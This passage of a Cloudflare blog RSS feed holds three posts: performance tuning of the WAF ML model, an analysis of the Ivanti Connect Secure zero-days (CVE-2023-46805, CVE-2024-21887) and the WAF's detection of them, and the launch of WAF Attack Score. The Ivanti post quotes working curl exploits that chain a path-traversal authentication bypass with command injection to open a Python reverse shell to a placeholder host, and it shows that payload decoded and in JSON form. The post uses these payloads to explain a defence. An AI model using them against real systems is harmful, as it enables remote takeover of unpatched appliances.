    <td><span>7.82%</span></td>
  </tr>
  <tr>
    <td><span>tflite::optimized_ops::SoftmaxImpl</span></td>
    <td><span>6.61%</span></td>
  </tr>
  <tr>
    <td><span>tflite::ops::builtin::elementwise::LogEval</span></td>
    <td><span>4.63%</span></td>
  </tr>
</tbody></table><p>Matrix multiplication now uses <a href="https://github.com/tensorflow/tensorflow/blob/15ec568b5505727c940b651aeb2a9643b504086c/tensorflow/lite/kernels/internal/optimized/sse_tensor_utils.cc#L161-L199">AVX2 instructions</a>, which uses blocks of 8x8 to multiply and accumulate the multiplication result.</p><p>Proportionally, matrix multiplication and <a href="https://www.cloudflare.com/learning/ai/what-is-quantization/">quantization</a> operations take a similar time share when compared to non-SIMD version, however in absolute numbers, it’s almost twice as fast when SIMD optimizations are enabled:</p>
<table><thead>
  <tr>
    <th><span>Benchmark case</span></th>
    <th><span>Baseline time, μs</span></th>
    <th><span>SIMD time, μs</span></th>
    <th><span>Optimization</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>inference/avg-body-1000</span></td>
    <td><span>246.31</span></td>
    <td><span>130.07</span></td>
    <td><span>-47.19% or 1.89x</span></td>
  </tr>
</tbody></table><p>Quite a nice performance boost just from a few lines of build config change!</p>
    <div>
      <h3>Tensorflow Lite with XNNPACK</h3>
      <a href="#tensorflow-lite-with-xnnpack">
        
      </a>
    </div>
    <p>Tensorflow Lite comes with a useful benchmarking tool called <a href="https://github.com/tensorflow/tensorflow/tree/master/tensorflow/lite/tools/benchmark">benchmark_model</a>, which also has a built-in profiler.</p><p>The tool can be built locally using the command:</p>
            <pre><code>bazel build -j 4 --copt=-march=native -c opt tensorflow/lite/tools/benchmark:benchmark_model</code></pre>
            <p>After building, benchmarks were run with different settings:</p>
<table><thead>
  <tr>
    <th><span>Benchmark run</span></th>
    <th><span>Inference time, μs</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>benchmark_model --graph=model.tflite --num_runs=100000 --use_xnnpack=false</span></td>
    <td><span>105.61</span></td>
  </tr>
  <tr>
    <td><span>benchmark_model --graph=model.tflite --num_runs=100000 --use_xnnpack=true --xnnpack_force_fp16=true</span></td>
    <td><span>111.95</span></td>
  </tr>
  <tr>
    <td><span>benchmark_model --graph=model.tflite --num_runs=100000 --use_xnnpack=true</span></td>
    <td><span>49.05</span></td>
  </tr>
</tbody></table><p>Tensorflow Lite with XNNPACK enabled emerges as a leader, achieving ~50% latency reduction, when compared to the original Tensorflow Lite implementation.</p><p>More technical details about XNNPACK can be found in these blog posts:</p><ul><li><p><a href="https://blog.tensorflow.org/2022/06/Profiling-XNNPACK-with-TFLite.html">Profiling XNNPACK with TFLite</a></p></li><li><p><a href="https://blog.tensorflow.org/2024/04/faster-dynamically-quantized-inference-with-xnnpack.html">Faster Dynamically Quantized Inference with XNNPack</a></p></li></ul><p>Re-running benchmarks with XNNPack enabled, we get the following results:</p>
<table><thead>
  <tr>
    <th><span>Benchmark case</span></th>
    <th><span>Baseline time, μs</span><br /><span>TFLite 2.6.0</span></th>
    <th><span>SIMD time, μs</span><br /><span>TFLite 2.6.0</span></th>
    <th><span>SIMD time, μs</span><br /><span>TFLite 2.16.1</span></th>
    <th><span>SIMD + XNNPack time, μs</span><br /><span>TFLite 2.16.1</span></th>
    <th><span>Optimization</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>inference/avg-body-1000</span></td>
    <td><span>246.31</span></td>
    <td><span>130.07</span></td>
    <td><span>115.17</span></td>
    <td><span>56.22</span></td>
    <td><span>-77.17% or 4.38x</span></td>
  </tr>
</tbody></table><p>By upgrading TensorFlow Lite from 2.6.0 to 2.16.1 and enabling SIMD optimizations along with the XNNPack, we were able to decrease WAF ML model inference time more than <b>four-fold</b>, achieving a <b>77.17%</b> reduction.</p>
    <div>
      <h2>Caching inference result</h2>
      <a href="#caching-inference-result">
        
      </a>
    </div>
    <p>While making code faster through pre-processing and inference optimizations is great, it's even better when code doesn't need to run at all. This is where caching comes in. <a href="https://en.wikipedia.org/wiki/Amdahl%27s_law">Amdahl's Law</a> suggests that optimizing only parts of a program has diminishing returns. By avoiding redundant executions with caching, we can achieve significant performance gains beyond the limitations of traditional code optimization.</p><p>A simple key-value cache would quickly occupy all available memory on the server due to the high cardinality of URLs, HTTP headers, and HTTP bodies. However, because "everything on the Internet has an L-shape" or more specifically, follows a <a href="https://en.wikipedia.org/wiki/Zipf%27s_law">Zipf's law</a> distribution, we can optimize our caching strategy.</p><p><a href="https://en.wikipedia.org/wiki/Zipf%27s_law">Zipf</a>'<a href="https://en.wikipedia.org/wiki/Zipf%27s_law">s law</a> states that in many natural datasets, the frequency of any item is inversely proportional to its rank in the frequency table. In other words, a few items are extremely common, while the majority are rare. By analyzing our request data, we found that URLs, HTTP headers, and even HTTP bodies follow this distribution. For example, here is the user agent header frequency distribution against its rank:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/50OWcB7Buza1Jp77ePY75X/e25e66e7665fccc454df026e5ca37729/unnamed--8--3.png" />
            
            </figure><p>By caching the top-N most frequently occurring inputs and their corresponding inference results, we can ensure that both pre-processing and inference are skipped for the majority of requests. This is where the <a href="https://en.wikipedia.org/wiki/Cache_replacement_policies#LRU">Least Recently Used (LRU)</a> cache comes in – frequently used items stay hot in the cache, while the least recently used ones are evicted.</p><p>We use <a href="https://github.com/openresty/lua-resty-lrucache">lua-resty-mlcache</a> as our caching solution, allowing us to share cached inference results between different Nginx workers via a shared memory dictionary. The LRU cache effectively exploits the <a href="https://en.wikipedia.org/wiki/Space%E2%80%93time_tradeoff">space-time trade-off</a>, where we trade a small amount of memory for significant CPU time savings.</p><p>This approach enables us to achieve a <b>~70%</b> cache hit ratio, significantly reducing latency further, as we will analyze in the final section below.</p>
    <div>
      <h2>Optimization results</h2>
      <a href="#optimization-results">
        
      </a>
    </div>
    <p>The optimizations discussed in this post were rolled out in several phases to ensure system correctness and stability.</p><p>First, we enabled SIMD optimizations for TensorFlow Lite, which reduced WAF ML total execution time by approximately <b>41.80%,</b> decreasing from <b>1519</b> ➔ <b>884 μs</b> on average.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/15SMdamloYpjyUy5ZwH9o0/ab4ec787f870d27a45ff513db1f696c8/unnamed--9--3.png" />
            
            </figure><p>Next, we upgraded TensorFlow Lite from version 2.6.0 to 2.16.1, enabled XNNPack, and implemented pre-processing optimizations. This further reduced WAF ML total execution time by <b>~40.77%</b>, bringing it down from <b>932</b> ➔ <b>552 μs</b> on average. The initial average time of 932 μs was slightly higher than the previous 884 μs due to the increased number of customers using this feature and the months that passed between changes.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/01EuBB1eVopVjUjWsVvwrK/0d908285bd4296d75f5c98918cf1a561/unnamed--10--3.png" />
            
            </figure><p>Lastly, we introduced LRU caching, which led to an additional reduction in WAF ML total execution time by <b>~50.18%</b>, from <b>552</b> ➔ <b>275 μs</b> on average.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6epSwp5jz4ZMaVfdwahZnN/8c23c1b6a90bf301f9e7f6566d4f3295/unnamed--11--3.png" />
            
            </figure><p>Overall, we cut WAF ML execution time by <b>~81.90%</b>, decreasing from <b>1519</b> ➔ <b>275 μs</b>, or <b>5.5x</b> faster!</p><p>To illustrate the significance of this: with Cloudflare’s average rate of 9.5 million requests per second passing through WAF ML, saving <b>1244 microseconds</b> per request equates to saving ~<b>32 years</b> of processing time every single day! That’s in addition to the savings of <b>523 microseconds</b> per request or <b>65 years</b> of processing time per day demonstrated last year in our <a href="/scalable-machine-learning-at-cloudflare">Every request, every microsecond: scalable machine learning at Cloudflare</a> post about our Bot Management product.</p>
    <div>
      <h2>Conclusion</h2>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>We hope you enjoyed reading about how we made our WAF ML models go brrr, just as much as we enjoyed implementing these optimizations to bring scalable WAF ML to more customers on a truly global scale.</p><p>Looking ahead, we are developing even more sophisticated ML security models. These advancements aim to bring our <a href="https://www.cloudflare.com/application-services/products/waf/">WAF</a> and <a href="https://www.cloudflare.com/application-services/products/bot-management/">Bot Management</a> products to the next level, making them even more useful and effective for our customers.</p> ]]></content:encoded>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[Performance]]></category>
            <category><![CDATA[Optimization]]></category>
            <category><![CDATA[Rust]]></category>
            <category><![CDATA[AI WAF]]></category>
            <category><![CDATA[WAF Attack Score]]></category>
            <guid isPermaLink="false">6y0Im81Uj2lKntznfYHfUY</guid>
            <dc:creator>Alex Bocharov</dc:creator>
        </item>
        <item>
            <title><![CDATA[How Cloudflare’s AI WAF proactively detected the Ivanti Connect Secure critical zero-day vulnerability]]></title>
            <link>https://blog.cloudflare.com/how-cloudflares-ai-waf-proactively-detected-ivanti-connect-secure-critical-zero-day-vulnerability/</link>
            <pubDate>Tue, 23 Jan 2024 14:00:48 GMT</pubDate>
            <description><![CDATA[ The issuance of Emergency Rules by Cloudflare on January 17, 2024, helped give customers a big advantage in dealing with these threats ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3RS6SAVZIQdSxkFz8zjeDM/77bd1b148c86f29e3d9d96e300bdf415/image1-2.png" />
            
            </figure><p>Most WAF providers rely on reactive methods, responding to vulnerabilities after they have been discovered and exploited. However, we believe in proactively addressing potential risks, and using AI to achieve this. Today we are sharing a recent example of a critical vulnerability (CVE-2023-46805 and CVE-2024-21887) and how Cloudflare's Attack Score powered by AI, and Emergency Rules in the WAF have countered this threat.</p>
    <div>
      <h3>The threat: CVE-2023-46805 and CVE-2024-21887</h3>
      <a href="#the-threat-cve-2023-46805-and-cve-2024-21887">
        
      </a>
    </div>
    <p>An authentication bypass (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46805">CVE-2023-46805</a>) and a command injection vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21887">CVE-2024-21887</a>) impacting Ivanti products were recently disclosed and analyzed by <a href="https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis">AttackerKB</a>. This vulnerability poses significant risks which could lead to unauthorized access and control over affected systems. In the following section we are going to discuss how this vulnerability can be exploited.</p>
    <div>
      <h3>Technical analysis</h3>
      <a href="#technical-analysis">
        
      </a>
    </div>
    <p>As discussed in <a href="https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis">AttackerKB</a>, the attacker can send a specially crafted request to the target system using a command like this:</p>
            <pre><code>curl -ik --path-as-is https://VICTIM/api/v1/totp/user-backup-code/../../license/keys-status/%3Bpython%20%2Dc%20%27import%20socket%2Csubprocess%3Bs%3Dsocket%2Esocket%28socket%2EAF%5FINET%2Csocket%2ESOCK%5FSTREAM%29%3Bs%2Econnect%28%28%22CONNECTBACKIP%22%2CCONNECTBACKPORT%29%29%3Bsubprocess%2Ecall%28%5B%22%2Fbin%2Fsh%22%2C%22%2Di%22%5D%2Cstdin%3Ds%2Efileno%28%29%2Cstdout%3Ds%2Efileno%28%29%2Cstderr%3Ds%2Efileno%28%29%29%27%3B</code></pre>
            <p>This command targets an endpoint (<b>/license/keys-status/)</b> that is usually protected by authentication. However, the attacker can bypass the authentication by manipulating the URL to include <b>/api/v1/totp/user-backup-code/../../license/keys-status/</b>. This technique is known as <a href="https://owasp.org/www-community/attacks/Path_Traversal">directory traversal</a>.</p><p>The URL-encoded part of the command decodes to a Python reverse shell, which looks like this:</p>
            <pre><code>;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("CONNECTBACKIP",CONNECTBACKPORT));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';</code></pre>
            <p>The Python reverse shell is a way for the attacker to gain control over the target system.</p><p>The vulnerability exists in the way the system processes the <b>node_name</b> parameter. If an attacker can control the value of <b>node_name</b>, they can inject commands into the system.</p><p>To elaborate on 'node_name': The 'node_name' parameter is a component of the endpoint /api/v1/license/keys-status/path:node_name. This endpoint is where the issue primarily occurs.</p><p>The attacker can send a GET request to the URI path <b>/api/v1/totp/user-backup-code/../../license/keys-status/;CMD;</b> where CMD is any command they wish to execute. By using a semicolon, they can specify this command in the request. To ensure the command is correctly processed by the system, it must be URL-encoded.</p><p>Another code injection vulnerability was identified, as detailed in the blog post from AttackerKB. This time, it involves an authenticated command injection found in a different part of the system.</p><p>The same Python reverse shell payload used in the first command injection can be employed here, forming a JSON structure to trigger the vulnerability. Since the payload is in JSON, it doesn't need to be URL-encoded:</p>
            <pre><code>{
    "type": ";python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"CONNECTBACKIP\",CONNECTBACKPORT));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';",
    "txtGCPProject": "a",
    "txtGCPSecret": "a",
    "txtGCPPath": "a",
    "txtGCPBucket": "a"
}</code></pre>
            <p>Although the <b>/api/v1/system/maintenance/archiving/cloud-server-test-connection</b> endpoint requires authentication, an attacker can bypass this by chaining it with the previously mentioned directory traversal vulnerability. They can construct an unauthenticated URI path <b>/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection</b> to reach this endpoint and exploit the vulnerability.</p><p>To execute an unauthenticated operating system command, an attacker would use a curl request like this:</p>
            <pre><code>curl -ik --path-as-is https://VICTIM/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection -H 'Content-Type: application/json' --data-binary $'{ \"type\": \";python -c \'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"CONNECTBACKIP\\\",CONNECTBACKPORT));subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())\';\", \"txtGCPProject\":\"a\", \"txtGCPSecret\":\"a\", \"txtGCPPath\":\"a\", \"txtGCPBucket\":\"a\" }'</code></pre>
            
    <div>
      <h3>Cloudflare's proactive defense</h3>
      <a href="#cloudflares-proactive-defense">
        
      </a>
    </div>
    <p>Cloudflare WAF is supported by an additional AI-powered layer called <a href="/stop-attacks-before-they-are-known-making-the-cloudflare-waf-smarter/">WAF Attack Score</a>, which is built for the purpose of catching attack bypasses before they are even announced. Attack Score provides a score to indicate if the request is malicious or not; focusing on three main categories until now: XSS, SQLi, and some RCE variations (Command Injection, ApacheLog4J, etc.). The score ranges from 1 to 99 and the lower the score the more malicious the request is. Generally speaking, any request with a score below 20 is considered malicious.</p><p>Looking at the results of the exploitation example above of CVE-2023-46805 and CVE-2024-21887 using Cloudflare’s dashboard (Security &gt; Events). Attack Score analysis results consist of three individual scores, each labeled to indicate their relevance to a specific attack category. There's also a global score, "WAF Attack Score", which considers the combined impact of these three scores. In some cases, the global score is affected by one of the sub-scores if the attack matches a category, here we can see the dominant sub-score is Remote Code Execution “WAF RCE Attack Score”.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/qkPQsiNBaL4HSooddJ7Mv/8e308dc48932a8ea859414bd664bbab3/image2-2.png" />
            
            </figure><p>Similarly, for the unauthenticated operating system command request, we received “WAF Attack Score: 19” from the AI model which also lies under the malicious request category. Worth mentioning the example scores are not fixed numbers and may vary based on the incoming attack variation.</p><p>The great news here is: customers on Enterprise and Business plans with WAF attack score enabled, along with a rule to block low scores (e.g. <code>[cf.waf.score](https://developers.cloudflare.com/waf/about/waf-attack-score/#available-scores) le 20</code>) or (<code>[cf.waf.score.class](https://developers.cloudflare.com/ruleset-engine/rules-language/fields/#field-cf-waf-score-class) eq</code> "<code>attack</code>") for Business, were already shielded from potential vulnerability exploits that were tested so far even before the vulnerability was announced.</p>
    <div>
      <h3>Emergency rule deployment</h3>
      <a href="#emergency-rule-deployment">
        
      </a>
    </div>
    <p>In response to this critical vulnerability, Cloudflare <a href="https://developers.cloudflare.com/waf/change-log/2024-01-17---emergency-release/">released Emergency Rules on January 17, 2024</a>, Within 24 hours after the proof of concept went public. These rules are part of its Managed Rules for the WAF, specifically targeting the threats posed by CVE-2023-46805 and an additional vulnerability, CVE-2024-21887, also related to Ivanti products. The rules, named "Ivanti - Auth Bypass, Command Injection - CVE:CVE-2023-46805, CVE:CVE-2024-21887," are developed to block attempts to exploit these vulnerabilities, providing an extra layer of security for Cloudflare users.</p><p>Since we deployed these rules, we have recorded a high level of activity. At the time of writing, the rule was triggered more than 180,000 times.</p>
<table>
<thead>
  <tr>
    <th><span>Rule ID</span></th>
    <th><span>Description</span></th>
    <th><span>Default Action</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>New Managed Rule…34ab53c5</span></td>
    <td><span>Ivanti - Auth Bypass, Command Injection - CVE:CVE-2023-46805, CVE:CVE-2024-21887</span></td>
    <td><span>Block</span></td>
  </tr>
  <tr>
    <td><span>Legacy Managed Rule</span><br /><span>100622</span><br /></td>
    <td><span>Ivanti - Auth Bypass, Command Injection - CVE:CVE-2023-46805, CVE:CVE-2024-21887</span></td>
    <td><span>Block</span></td>
  </tr>
</tbody>
</table>
    <div>
      <h3>Implications and best practices</h3>
      <a href="#implications-and-best-practices">
        
      </a>
    </div>
    <p>Cloudflare's response to CVE-2023-46805 and CVE-2024-21887 underscores the importance of having robust security measures in place. Organizations using Cloudflare services, particularly the WAF, are advised to ensure that their systems are updated with the latest rules and configurations to maintain optimal protection. We also recommend customers to deploy rules using Attack Score to improve their security posture. If you want to learn more about Attack Score, contact your account team.</p>
    <div>
      <h3>Conclusion</h3>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>Cloudflare's proactive approach to cybersecurity using AI to identify and stop attacks, exemplified by its response to CVE-2023-46805 and CVE-2024-21887, highlights how threats and attacks can be identified before they are made public and vulnerabilities disclosed. By continuously monitoring and rapidly responding to vulnerabilities, Cloudflare ensures that its clients remain secure in an increasingly complex digital landscape.</p> ]]></content:encoded>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[WAF Rules]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[WAF Attack Score]]></category>
            <category><![CDATA[Zero Day Threats]]></category>
            <category><![CDATA[AI WAF]]></category>
            <guid isPermaLink="false">4HVUjfTR7K6M1rk2RCgVkA</guid>
            <dc:creator>Himanshu Anand</dc:creator>
            <dc:creator>Radwa Radwan</dc:creator>
            <dc:creator>Vaibhav Singhal</dc:creator>
        </item>
        <item>
            <title><![CDATA[Stop attacks before they are known: making the Cloudflare WAF smarter]]></title>
            <link>https://blog.cloudflare.com/stop-attacks-before-they-are-known-making-the-cloudflare-waf-smarter/</link>
            <pubDate>Fri, 09 Dec 2022 14:00:00 GMT</pubDate>
            <description><![CDATA[ Today we are making the WAF smarter by increasing availability of our new machine learning powered enhancement, the WAF Attack Score! ]]></description>
            <content:encoded><![CDATA[ <p><i></i></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1Y8psmovGouHLkHICnduJb/739b4209e553b9e87f163ef8662e1a51/image5-2.png" />
            
            </figure><p><a href="https://www.cloudflare.com/waf/">Cloudflare’s WAF</a> helps site owners keep their application safe from attackers. It does this by analyzing traffic with the <a href="https://developers.cloudflare.com/waf/managed-rulesets/reference/cloudflare-managed-ruleset/">Cloudflare Managed Rules</a>: handwritten highly specialized rules that detect and stop malicious payloads. But they have a problem: if a rule is not written for a specific attack, it will not detect it.</p><p>Today, we are solving this problem by making our <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">WAF</a> smarter and announcing our WAF attack scoring system in general availability.</p><p>Customers on our Enterprise Core and Advanced Security bundles will have gradual access to this new feature. All remaining Enterprise customers will gain access over the coming months.</p><p>Our WAF attack scoring system, fully complementary to our Cloudflare Managed Rules, classifies all requests using a model trained on observed true positives across the Cloudflare network, allowing you to detect (and block) evasion, bypass and new attack techniques before they are publicly known.</p>
    <div>
      <h2>The problem with signature based WAFs</h2>
      <a href="#the-problem-with-signature-based-wafs">
        
      </a>
    </div>
    <p>Attackers trying to infiltrate web applications often use known or recently disclosed payloads. The Cloudflare WAF has been built to handle these attacks very well. The Cloudflare Managed Ruleset and the Cloudflare <a href="https://en.wikipedia.org/wiki/OWASP">OWASP</a> Managed Ruleset are in fact continuously updated and aimed at protecting web applications against known threats while minimizing false positives.</p><p>Things become harder with not publicly known attacks, often referred to as <a href="https://en.wikipedia.org/wiki/Zero-day_(computing)">zero-days</a>. While our teams do their best to research new threat vectors and keep the Cloudflare Managed rules updated, human speed becomes a limiting factor. Every time a new vector is found a window of opportunity becomes available for attackers to bypass mitigations.</p><p>One well known example was the <a href="/cve-2021-44228-log4j-rce-0-day-mitigation/">Log4j RCE attack</a>, where we had to deploy frequent rule updates as new bypasses were discovered by changing the known <a href="/exploitation-of-cve-2021-44228-before-public-disclosure-and-evolution-of-waf-evasion-patterns/">attack patterns</a>.</p>
    <div>
      <h2>The solution: complement signatures with a machine learning scoring model</h2>
      <a href="#the-solution-complement-signatures-with-a-machine-learning-scoring-model">
        
      </a>
    </div>
    <p>Our WAF attack scoring system is a machine-learning-powered enhancement to Cloudflare’s WAF. It scores every request with a probability of it being malicious. You can then use this score when implementing WAF Custom Rules to keep your application safe alongside existing Cloudflare Managed Rules.</p>
    <div>
      <h3>How do we use machine learning in Cloudflare’s WAF?</h3>
      <a href="#how-do-we-use-machine-learning-in-cloudflares-waf">
        
      </a>
    </div>
    <p>In any classification problem, the quality of the training set directly relates to the quality of the classification output, so a lot of effort was put into preparing the training data.</p><p>And this is where we used a Cloudflare superpower: we took advantage of Cloudflare’s network visibility by gathering millions of true positive samples generated by our existing signature based WAF and further enhanced it by using techniques covered in “<a href="/data-generation-and-sampling-strategies/">Improving the accuracy of our machine learning WAF</a>”.</p><p>This allowed us to train a <a href="https://www.cloudflare.com/learning/ai/what-is-machine-learning/">model</a> that is able to classify, given an HTTP request, the probability that the request contains a malicious payload, but more importantly, to classify when a request is very similar to a known true positive but yet sufficiently different to avoid a managed rule match.</p><p>The model runs inline to HTTP traffic and as of today it is optimized for three attack categories: SQL Injection (SQLi), <a href="https://www.cloudflare.com/learning/security/threats/cross-site-scripting/">Cross Site Scripting (XSS)</a>, and a wide range of Remote Code Execution (RCE) attacks such as shell injection, PHP injection, Apache Struts type compromises, Apache log4j, and similar attacks that result in RCE. We plan to add additional attack types in the future.</p><p>The output scores are similar to the <a href="/introducing-bot-analytics/">Bot Management</a> scores; they range between 1 and 99, where low scores indicate malicious or likely malicious and high scores indicate clean or likely clean HTTP request.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/57Kl8w8yxxC4ZZ7DOu2tUB/aeb585344cca76782bb44949547d22f5/image4-5.png" />
            
            </figure>
    <div>
      <h3>Proving immediate value</h3>
      <a href="#proving-immediate-value">
        
      </a>
    </div>
    <p>As one example of the effectiveness of this new system, on October 13, 2022 <a href="https://nvd.nist.gov/vuln/detail/CVE-2022-42889">CVE-2022-42889</a> was identified as a “Critical Severity” in <a href="https://github.com/apache/commons-text">Apache Commons Text</a> affecting versions 1.5 through 1.9.</p><p>The payload used in the attack, although not immediately blocked by our Cloudflare Managed Rules, was correctly identified (by scoring very low) by our attack scoring system. This allowed us to protect endpoints and identify the attack with zero time to deploy. Of course, we also still updated the Cloudflare Managed Rules to cover the new attack vector, as this allows us to improve our training data further completing our feedback loop.</p>
    <div>
      <h2>Know what you don’t know with the new Security Analytics</h2>
      <a href="#know-what-you-dont-know-with-the-new-security-analytics">
        
      </a>
    </div>
    <p>In addition to the attack scoring system, we have another big announcement: our new Security Analytics! You can read more about this in <a href="/security-analytics">the official announcement</a>.</p><p>Using the new security analytics you can view the attack score distribution regardless of whether the requests were blocked or not allowing you to explore potentially malicious attacks before deploying any rules.</p><p>The view won’t only show the WAF Attack Score but also Bot Management and Content Scanning with the ability to mix and match filters as you desire.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1MJ8mVGxP5c3qKrOMXs0H9/133a8f226856815f52cd8eb720b4d58c/image1-10.png" />
            
            </figure>
    <div>
      <h2>How to use the WAF Attack Score and Security Analytics</h2>
      <a href="#how-to-use-the-waf-attack-score-and-security-analytics">
        
      </a>
    </div>
    <p>Let’s go on a tour to spot attacks using the new Security Analytics, and then use the WAF Attack Scores to mitigate them.</p>
    <div>
      <h3>Starting with Security Analytics</h3>
      <a href="#starting-with-security-analytics">
        
      </a>
    </div>
    <p>This new view has the power to show you everything in one place about your traffic. You have tens of filters to mix and match from, top statistics, multiple interactive graph distributions, as well as the log samples to verify your insights. In essence this gives you the ability to preview a number of filters without the need to create WAF Custom Rules in the first place.</p><p><b>Step 1</b> - access the new Security Analytics: To Access the new Security Analytics in the dashboard, head over to the “Security” tab (<b>Security &gt; Analytics</b>), the previous (<b>Security &gt; Overview</b>) still exists under (<b>Security &gt; Events</b>). You must have access to at least the WAF Attack Score to be able to see the new Security Analytics for the time being.</p><p><b>Step 2</b> - explore insights: On the new analytics page, you will view the time distribution of your entire traffic, along with many filters on the right side showing distributions for several features including the WAF Attack Score and the Bot Management score, to make it super easy to apply interesting filters we added the “Insights” section.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3V7Pd5okduXI6BO4jeap8x/3c83d5906069bab7c8f9f379e5b8f917/image7.png" />
            
            </figure><p>By choosing the “Attack Analysis” option you see a stacked chart overview of how your traffic looks from the WAF Attack Score perspective.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/135BsLRB5Hu7wQ9LjylJ9P/878088234864a20d5937a3c3384486bd/image6.png" />
            
            </figure><p><b>Step 3</b> - filter on attack traffic: A good place to start is to look for unmitigated HTTP requests classified as attacks. You can do this by using the attack score sliders on the right-hand side or by selecting any of the insights’ filters which are easy to use one click shortcuts. All charts will be updated automatically according to the selected filters.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1OzYL2gC8J4Eul4rGy7WTZ/82f2d21878900893672b8fcac74571f6/image8.png" />
            
            </figure><p><b>Step 4</b> - verify the attack traffic: This can be done by expanding the sampled logs below the traffic distribution graph, for instance in the below expanded log, you can see a very low RCE score indicating an “Attack”, along with Bot score indicating that the request was “Likely Automated”. Looking at the “Path” field, we can confirm that indeed this is a malicious request. Note that not all fields are currently logged/shown. For example a request might receive a low score due to a malicious payload in the HTTP body which cannot be easily verified in the sample logs today.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6EBEaIA2jadEY4X65fR3Sd/079466cb5fba24e54ef2eddf00fe0352/image3-2.png" />
            
            </figure><p><b>Step 5</b> - create a rule to mitigate the attack traffic: Once you have verified that your filter is not matching false positives, by using a single click on the “Create custom rule” button, you will be directed to the WAF Custom Rules builder with all your filters pre-populated and ready for you to “Deploy”.</p>
    <div>
      <h3>Attack scores in Security Event logs</h3>
      <a href="#attack-scores-in-security-event-logs">
        
      </a>
    </div>
    <p>WAF Attack Scores are also available in <a href="https://developers.cloudflare.com/logs/reference/log-fields/zone/http_requests/">HTTP logs</a>, and by navigating to (<b>Security &gt; Events)</b> when expanding any of the event log samples:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1ypnJCxaCSKPyKpplU9ZpZ/1265e36223de98d5714a8f113173cc40/image2-7.png" />
            
            </figure><p>Note that all the new fields are available in WAF Custom Rules and WAF Rate Limiting Rules. These are documented in our developer <a href="https://developers.cloudflare.com/waf/about/waf-ml/">docs</a>: <code>cf.waf.score</code>, <code>cf.waf.score.xss</code>, <code>cf.waf.score.sqli</code>, and <code>cf.waf.score.rce</code>.</p><p>Although the easiest way to use these fields is by starting from our new Security Analytics dashboard as described above, you can use them as is when building rules and of course mixing with any other available field. The following example deploys a “Log” Action rule for any request with aggregate WAF Attack Score (<code>cf.waf.score</code>) less than 40.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/Ij7IQl7b2fRa5Gmv3Cofo/e6e7a823b8e58f45af324abc40c2e0bd/image9.png" />
            
            </figure>
    <div>
      <h2>What’s next?</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>This is just step one of many to make our Cloudflare WAF truly “intelligent”. In addition to rolling this new technology out to more customers, we are already working on providing even better visibility and cover additional attack vectors. For all that and more, stay tuned!</p> ]]></content:encoded>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[WAF Attack Score]]></category>
            <category><![CDATA[AI]]></category>
            <guid isPermaLink="false">1Hx5ZYnFOhSRubpCFHlREO</guid>
            <dc:creator>Radwa Radwan</dc:creator>
        </item>
    </channel>
</rss>